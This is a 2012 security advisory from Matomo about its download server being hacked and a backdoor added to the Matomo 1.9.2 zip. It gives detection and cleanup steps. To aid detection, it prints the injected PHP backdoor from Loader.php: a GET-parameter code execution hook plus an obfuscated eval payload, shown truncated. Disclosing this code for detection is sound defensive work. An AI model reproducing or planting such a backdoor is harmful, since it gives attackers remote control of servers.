Security Report: Matomo.org webserver hacked for a few hours on 2012 Nov 26th

Contents

Update 2014: since this event occurred almost two years ago, we have made numerous improvements and added layers of security to ensure it does not happen again:

Important Security Announcement: Matomo.org webserver got compromised by an attacker on 2012 Nov 26th, this attacker added a malicious code in the Matomo 1.9.2 Zip file for a few hours.

How do I know if my Matomo server is safe?

You would be at risk only if you installed or updated to Matomo 1.9.2 on Nov 26th from 15:43 UTC to 23:59 UTC.
If you are not using 1.9.2, or if you have updated to 1.9.2 earlier than Nov 26th 15:40 UTC or from Nov 27th, you should be safe.

How do I double check if my Matomo server is affected?

To check if your Matomo is affected, open the file piwik/core/Loader.php – a clean file looks like this, where as a compromised Loader.php would contain the following code at the end of the file:

<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$

If you see this malicious code in your piwik/core/Loader.php file, read below to fix this issue.

How do I fix my Matomo if it is compromised?
If you Matomo is compromised, follow these steps:

  1. Backup piwik/config/config.ini.php
  2. DELETE the piwik/ directory
    It is important to DELETE the directory and all piwik files, to ensure any malicious script is deleted as well.
  3. Download latest Matomo from piwik.org
  4. Unzip and Upload the piwik/ directory on your server
  5. Copy the config.ini.php back in /piwik/config/
  6. Go to Matomo, it should display the dashboard as expected

You have now successful restored Matomo to a clean version.

If you have other web softwares running in the same path on your server, we would recommend to be safe and restore a backup of these other softwares as well.

How did the attacker got in piwik.org?

Attacker used a security issue in a WordPress plugin we were using, and gained partial access to the piwik.org server.

Is there a security bug in Matomo software itself?

The website Matomo.org is running WordPress and got compromised, because of a security issue in a WordPress plugin. As far as we know, the Matomo software does not have any exploitable security issue. We have a security bug bounty program in place that rewards researchers for finding security issues in Matomo software, and disclosing them to us. We also document here how you can make your own Matomo data safer and secure your server.

Has any sensitive data been leaked?

Matomo is a self-hosted, open source software. Matomo.org does not track any web analytics data from any Matomo user. No personal or sensitive data has been leaked since we do not track any.

What we are doing to prevent further issues

We are still working with our system administrators on the issue and have some ideas to make this kind of problems much less likely to occur. We will post a follow up once these new mechanisms are in place.

Summary

We would like to thank the Matomo users who quickly reported this problem (by email and in the forums). We received more than five reports in a two hours timeframe, which shows that the Matomo community is very vigilant and ready to react to any problem.

We are truly sorry for the inconvenience. Please be sure that we will do our best to keep Matomo (and Matomo.org) a safe place in the future.

Contact us at security@piwik.org if you need more info.

Enjoyed this post?
Join the 160,000+ subscribers who receive the Matomo Newsletter straight to their inbox every month
Get started with Matomo

A powerful web analytics platform that gives you and your business 100% data ownership and user privacy protection.

No credit card required.

Free forever.

Get started with Matomo

A powerful web analytics platform that gives you and your business 100% data ownership and user privacy protection.

No credit card required.

Free forever.